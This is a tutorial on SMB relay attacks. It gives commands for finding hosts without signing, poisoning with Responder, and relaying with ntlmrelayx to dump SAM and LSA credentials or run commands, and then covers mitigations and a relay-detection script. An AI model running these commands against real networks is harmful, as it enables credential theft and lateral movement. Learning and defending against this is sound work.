SMB Relay Attacks: From Network Capture to Domain Compromise

An SMB relay attack abuses the challenge/response design of NTLM. The attacker sits between a victim that is trying to authenticate and a target server, and forwards the victim's NTLM messages to the target as they arrive. The target believes it has authenticated the victim, the attacker ends up holding an authenticated SMB session, and at no point does the attacker need the password or a crackable hash. The result is lateral movement with whatever rights the relayed account has on the target.

Prerequisites

  • SMB signing must not be required on the target. Domain controllers require it by default; most member servers and workstations only have it "enabled", which still relays.
  • Something must make a victim authenticate to the attacker's host. Phase 2 does this with LLMNR/NBT-NS poisoning; what gets relayed is a single NTLM challenge/response exchange, so no password or cracked hash is ever needed.
  • For the SAM dump and command execution in Phase 3, the relayed account must be a local administrator on the target. A non-admin account still yields an authenticated session, just not those actions.
  • The target must be a different host from the one the victim is authenticating from. Relaying an authentication back to its source (SMB reflection) was closed by MS08-068.

Phase 1: Identify Targets Without SMB Signing

# Scan for hosts where SMB signing is disabled or not required and write the
# relayable IPs, one per line, to targets.txt. NetExec, the maintained fork of
# CrackMapExec, takes the same flag: nxc smb 10.10.10.0/24 --gen-relay-list targets.txt
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt

Alternative using Nmap

# Relayable hosts report "Message signing enabled but not required";
# hosts reporting "enabled and required" must be left out of the target list
nmap --script smb2-security-mode -p445 10.10.10.0/24
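The Nmap route leaves you with a text report rather than a target file. The script below, an added example that is not part of the original post or of nmap/impacket, parses nmap's normal (-oN) output for the smb2-security-mode script and keeps only the hosts whose signing is not required, which is exactly what ntlmrelayx's -tf wants. The scan text embedded in it is constructed for the demo, and the verdict strings it matches are assumed to be the ones the script prints; the attacker IP passed on the command line is hypothetical.

```python
"""Turn nmap smb2-security-mode output into an ntlmrelayx target list.

Added example, not part of the original post or of nmap/impacket. It reads
nmap's normal (-oN) output and keeps only hosts whose SMB2 signing is not
required, which is what makes a host relayable. The scan text below is
constructed for the demo; a real run of
`nmap --script smb2-security-mode -p445 10.10.10.0/24 -oN scan.txt`
produces the same layout.
"""
import ipaddress
import re
import sys

# Assumption: the verdict strings printed by nmap's smb2-security-mode script.
REQUIRED = "Message signing enabled and required"
RELAYABLE = ("Message signing enabled but not required", "Message signing disabled")

# "Nmap scan report for 10.0.0.5" or "Nmap scan report for host.example (10.0.0.5)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")

SAMPLE_SCAN = """\
# Nmap scan initiated (constructed sample output)
Nmap scan report for 10.10.10.5
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for ws01.corp.local (10.10.10.21)
Host is up (0.0021s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.22
Host is up (0.0019s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.30
Host is up (0.0030s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
"""


def signing_status(nmap_output):
    """Map each host that produced a verdict to 'required' or 'relayable'."""
    status = {}
    current = None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)          # a new host block starts here
            continue
        if current and "Message signing" in line:
            verdict = line.lstrip("|_ ").strip()
            if verdict.startswith(REQUIRED):
                status[current] = "required"
            elif verdict.startswith(RELAYABLE):
                status[current] = "relayable"
    return status


def relay_targets(nmap_output, exclude=()):
    """Relayable IPs in address order, minus `exclude`.

    Put the attacker's own address in `exclude`: a host cannot be relayed
    to itself, and ntlmrelayx would waste an incoming authentication on it.
    """
    return sorted((ip for ip, s in signing_status(nmap_output).items()
                   if s == "relayable" and ip not in exclude),
                  key=ipaddress.ip_address)


if __name__ == "__main__":
    # usage: python3 relay_targets.py scan.txt [attacker_ip] > targets.txt
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCAN
    own_ip = sys.argv[2:3]                  # hypothetical attacker IP, if given
    print("\n".join(relay_targets(text, exclude=own_ip)))
```

Hosts with 445 filtered or no script verdict never enter the status map, so they cannot leak into the target list by accident; the "required" hosts are kept in the map only so you can see they were scanned and deliberately skipped.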

Phase 2: LLMNR/NBT-NS Poisoning

# Configure Responder: turn off its own SMB and HTTP servers so the incoming
# connections reach ntlmrelayx, which binds ports 445 and 80 itself. With them
# left on, Responder captures a NetNTLMv2 hash instead of letting it be relayed.
sudo vim /etc/responder/Responder.conf
# Set SMB = Off and HTTP = Off under [Responder Core]

Start Responder for poisoning

# -I interface, -w serve a rogue WPAD proxy, -P force proxy authentication, -v verbose.
# In Responder 3.x, -d enables DHCP poisoning, which can disrupt clients;
# drop it if LLMNR/NBT-NS/mDNS poisoning is all you need
sudo responder -I eth0 -dwPv

Phase 3: Relay Attack

# Listen on 445 and 80 and relay each incoming NTLM authentication to the next
# host in targets.txt. With no -c/-e, the default action against an SMB target
# is to dump the local SAM hashes (this needs local admin on the target)
sudo ntlmrelayx.py -tf targets.txt -smb2support

Relay with LSA secrets dump

# Dump LSA secrets (cached domain credentials, service account passwords)
sudo ntlmrelayx.py -tf targets.txt -smb2support --dump-lsa

Relay with command execution

# Run a command on the target instead of dumping secrets. It executes as SYSTEM
# and is noisier than the default dump, so use it only when you need execution
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami /all"

Mitigation

  • Require SMB signing on every host via GPO ("Microsoft network server: Digitally sign communications (always)" and the matching client setting), not only on domain controllers. Signing that is "enabled" but not "required" does not stop a relay.
  • Disable LLMNR with the DNS Client policy "Turn off multicast name resolution" and turn off NetBIOS over TCP/IP on the adapters (directly or through the DHCP vendor option that disables NetBIOS). Without poisoning, victims rarely authenticate to the attacker in the first place.
  • Segment the network and block workstation-to-workstation SMB (TCP 445). Workstations rarely need it, and that is where relayed sessions usually land.
  • Do not rely on EDR signatures for the relay tools alone: on the target, a relayed logon is an ordinary NTLM network logon (event 4624, logon type 3). Detect the behaviour instead: NTLM logons whose source IP is not the host named in the event's workstation field, one source IP authenticating as several accounts in a short window, and any answer to an LLMNR/NBT-NS query for a name that should never resolve (a scheduled query for a non-existent name is a cheap poisoning canary).
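The two logon-based indicators above are easy to operationalise once 4624 events are collected centrally. The script below is an added example, not from the original post or any vendor product; it assumes events have been normalised to dicts carrying the event's standard field names, and that an asset inventory can say which IP a workstation name should own. Every event in it is constructed: 10.10.10.99 is a hypothetical attacker host relaying alice's and bob's authentications to FS01 and SRV02, the rest is benign noise.

```python
"""Heuristic detection of relayed NTLM logons from Windows Security events.

Added example, not from the original post or any vendor product. It assumes
4624 events have been collected centrally (WEF, a SIEM export) and normalised
to dicts with the event's standard fields. All events below are constructed:
10.10.10.99 is a hypothetical attacker box relaying alice's and bob's
authentications to FS01 and SRV02; the other events are benign noise.

Two tells are checked:
  1. WorkstationName in a relayed logon comes from the victim's NTLM
     AUTHENTICATE message, but IpAddress is the TCP peer, i.e. the attacker.
     If an asset inventory says which IP a workstation name owns, a mismatch
     is a strong indicator.
  2. One source IP presenting several distinct accounts over NTLM in a short
     window looks like a relay (or a poisoner harvesting several victims).
     Raise the threshold for RDS and jump hosts, where this is normal.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
MIN_DISTINCT_ACCOUNTS = 2     # demo threshold; raise on terminal servers

# Constructed asset inventory: workstation name -> IP it should be coming from.
INVENTORY = {"WS01": "10.10.10.21", "WS02": "10.10.10.22", "WS03": "10.10.10.23"}


def ev(hhmmss, user, workstation, ip, computer, pkg="NTLM", logon_type=3):
    """Build a minimal 4624 record (constructed, same field names as the event)."""
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return {
        "EventID": 4624, "TimeCreated": datetime(2024, 1, 1, h, m, s),
        "TargetDomainName": "CORP", "TargetUserName": user,
        "LogonType": logon_type, "AuthenticationPackageName": pkg,
        "WorkstationName": workstation, "IpAddress": ip, "Computer": computer,
    }


EVENTS = [
    ev("10:00:00", "alice", "WS01", "10.10.10.99", "FS01"),                 # relayed
    ev("10:00:05", "alice", "WS01", "10.10.10.99", "SRV02"),                # relayed
    ev("10:00:30", "carol", "WS03", "10.10.10.23", "FS01"),                 # benign NTLM
    ev("10:00:40", "dave", "WS04", "10.10.10.24", "FS01", pkg="Kerberos"),  # not NTLM, ignored
    ev("10:01:10", "bob", "WS02", "10.10.10.99", "FS01"),                   # relayed
    ev("10:03:00", "erin", "FS01", "-", "FS01", logon_type=2),              # console logon, ignored
]


def ntlm_network_logons(events):
    """Only NTLM network logons: the shape every relayed authentication takes."""
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonType"] == 3
            and e["AuthenticationPackageName"] == "NTLM"]


def workstation_ip_mismatches(events, inventory=INVENTORY):
    """Events whose claimed WorkstationName is not the host that owns IpAddress."""
    hits = []
    for e in ntlm_network_logons(events):
        expected = inventory.get(e["WorkstationName"].upper())
        if expected is not None and expected != e["IpAddress"]:
            hits.append(e)
    return hits


def multi_account_sources(events, window=WINDOW, threshold=MIN_DISTINCT_ACCOUNTS):
    """Source IPs that presented >= threshold distinct accounts within one window.

    Returns {ip: {"accounts": set, "targets": set}} for the first window that trips.
    """
    by_src = defaultdict(list)
    for e in sorted(ntlm_network_logons(events), key=lambda e: e["TimeCreated"]):
        by_src[e["IpAddress"]].append(e)
    flagged = {}
    for src, evs in by_src.items():
        for i, first in enumerate(evs):
            window_evs = [e for e in evs[i:]
                          if e["TimeCreated"] - first["TimeCreated"] <= window]
            accounts = {e["TargetDomainName"] + "\\" + e["TargetUserName"] for e in window_evs}
            if len(accounts) >= threshold:
                flagged[src] = {"accounts": accounts,
                                "targets": {e["Computer"] for e in window_evs}}
                break
    return flagged


if __name__ == "__main__":
    for e in workstation_ip_mismatches(EVENTS):
        print(f"mismatch: {e['TargetUserName']} claims {e['WorkstationName']} "
              f"but came from {e['IpAddress']} -> {e['Computer']}")
    for src, info in multi_account_sources(EVENTS).items():
        print(f"multi-account source {src}: {sorted(info['accounts'])} -> {sorted(info['targets'])}")
```

The inventory check is the higher-confidence one because it keys on a property the attacker cannot control (the TCP source the target saw) against one the victim's client fills in; the multi-account window is a useful backstop where the inventory is incomplete, but it needs per-host tuning.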